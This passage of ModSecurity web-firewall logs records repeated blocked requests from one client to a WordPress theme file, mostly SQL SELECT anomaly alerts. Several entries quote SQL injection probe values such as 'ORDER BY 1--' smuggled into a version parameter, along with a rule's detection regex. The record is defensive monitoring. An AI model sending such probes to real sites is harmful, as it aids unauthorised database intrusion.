"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExb6g1rY6w-xq1eShSXQAAAFE"] [Fri Jul 12 08:36:48.149697 2024] [:error] [pid 29518:tid 139783745537792] [client 141.98.81.44:38176] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExcKg1rY6w-xq1eShSXgAAAE4"] [Fri Jul 12 08:36:48.487942 2024] [:error] [pid 30143:tid 139783703574272] [client 141.98.81.44:38178] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1-- VVAr"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExcBoAeojmxWlFps7wxwAAANM"] [Fri Jul 12 08:36:49.969360 2024] [:error] [pid 30143:tid 139783720359680] [client 141.98.81.44:38180] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExcRoAeojmxWlFps7wyAAAANE"] [Fri Jul 12 08:36:50.223951 2024] [:error] [pid 29518:tid 139783737145088] [client 141.98.81.44:38182] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExcqg1rY6w-xq1eShSXwAAAE8"] [Fri Jul 12 08:36:50.478462 2024] [:error] [pid 30143:tid 139783737145088] [client 141.98.81.44:38186] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExchoAeojmxWlFps7wyQAAAM8"] [Fri Jul 12 08:36:50.731867 2024] [:error] [pid 29519:tid 139783745537792] [client 141.98.81.44:38188] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExcjEhNOprNgeRyDcP-gAAAI4"] [Fri Jul 12 08:36:50.981191 2024] [:error] [pid 30143:tid 139783924430592] [client 141.98.81.44:38190] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExchoAeojmxWlFps7wygAAAME"] [Fri Jul 12 08:36:51.240272 2024] [:error] [pid 30143:tid 139783916037888] [client 141.98.81.44:38194] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExcxoAeojmxWlFps7wywAAAMI"] [Fri Jul 12 08:36:51.494536 2024] [:error] [pid 29518:tid 139783703574272] [client 141.98.81.44:38198] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExc6g1rY6w-xq1eShSYQAAAFM"] [Fri Jul 12 08:36:51.782084 2024] [:error] [pid 29519:tid 139783737145088] [client 141.98.81.44:38200] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExczEhNOprNgeRyDcP-wAAAI8"] [Fri Jul 12 08:36:52.116007 2024] [:error] [pid 29519:tid 139783678396160] [client 141.98.81.44:38202] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExdDEhNOprNgeRyDcP_AAAAJY"] [Fri Jul 12 08:36:52.425762 2024] [:error] [pid 29519:tid 139783753930496] [client 141.98.81.44:38204] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExdDEhNOprNgeRyDcP_QAAAI0"] [Fri Jul 12 08:36:52.975167 2024] [:error] [pid 30143:tid 139783695181568] [client 141.98.81.44:38206] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47) ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExdBoAeojmxWlFps7wzQAAANQ"] [Fri Jul 12 08:36:53.378122 2024] [:error] [pid 30143:tid 139783907645184] [client 141.98.81.44:38208] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExdRoAeojmxWlFps7wzgAAAMM"] [Fri Jul 12 08:36:53.695363 2024] [:error] [pid 30143:tid 139783678396160] [client 141.98.81.44:38210] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExdRoAeojmxWlFps7wzwAAANY"] [Fri Jul 12 08:36:54.168232 2024] [:error] [pid 30143:tid 139783890859776] [client 141.98.81.44:38212] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExdhoAeojmxWlFps7w0AAAAMU"] [Fri Jul 12 08:36:54.478309 2024] [:error] [pid 30143:tid 139783762323200] [client 141.98.81.44:38214] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExdhoAeojmxWlFps7w0QAAAMw"] [Fri Jul 12 08:36:54.858212 2024] [:error] [pid 29517:tid 139783882467072] [client 141.98.81.44:38216] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExdvUCh5vf5PuAcijkAgAAAAY"] [Fri Jul 12 08:36:55.168949 2024] [:error] [pid 30143:tid 139783882467072] [client 141.98.81.44:38218] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExdxoAeojmxWlFps7w0gAAAMY"] [Fri Jul 12 08:36:57.399425 2024] [:error] [pid 30143:tid 139783804286720] [client 141.98.81.44:38220] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExeRoAeojmxWlFps7w0wAAAMc"] [Fri Jul 12 08:36:57.640957 2024] [:error] [pid 29519:tid 139783779108608] [client 141.98.81.44:38222] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExeTEhNOprNgeRyDcP_gAAAIo"] [Fri Jul 12 08:36:57.894139 2024] [:error] [pid 29519:tid 139783762323200] [client 141.98.81.44:38224] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExeTEhNOprNgeRyDcP_wAAAIw"] [Fri Jul 12 08:36:58.139847 2024] [:error] [pid 29519:tid 139783795894016] [client 141.98.81.44:38226] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExejEhNOprNgeRyDcQAAAAAIg"] [Fri Jul 12 08:36:58.393886 2024] [:error] [pid 29517:tid 139783779108608] [client 141.98.81.44:38228] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExevUCh5vf5PuAcijkAwAAAAo"] [Fri Jul 12 08:36:58.735770 2024] [:error] [pid 29519:tid 139783804286720] [client 141.98.81.44:38230] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExejEhNOprNgeRyDcQAQAAAIc"] [Fri Jul 12 08:36:59.170811 2024] [:error] [pid 29519:tid 139783882467072] [client 141.98.81.44:38232] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExezEhNOprNgeRyDcQAgAAAIY"] [Fri Jul 12 08:36:59.579044 2024] [:error] [pid 29519:tid 139783907645184] [client 141.98.81.44:38234] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExezEhNOprNgeRyDcQAwAAAIM"] [Fri Jul 12 08:36:59.852227 2024] [:error] [pid 29519:tid 139783899252480] [client 141.98.81.44:38236] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExezEhNOprNgeRyDcQBAAAAIQ"] [Fri Jul 12 08:37:00.271988 2024] [:error] [pid 29518:tid 139783924430592] [client 141.98.81.44:38238] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExfKg1rY6w-xq1eShSYgAAAEE"] [Fri Jul 12 08:37:00.628738 2024] [:error] [pid 29518:tid 139783916037888] [client 141.98.81.44:38240] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag 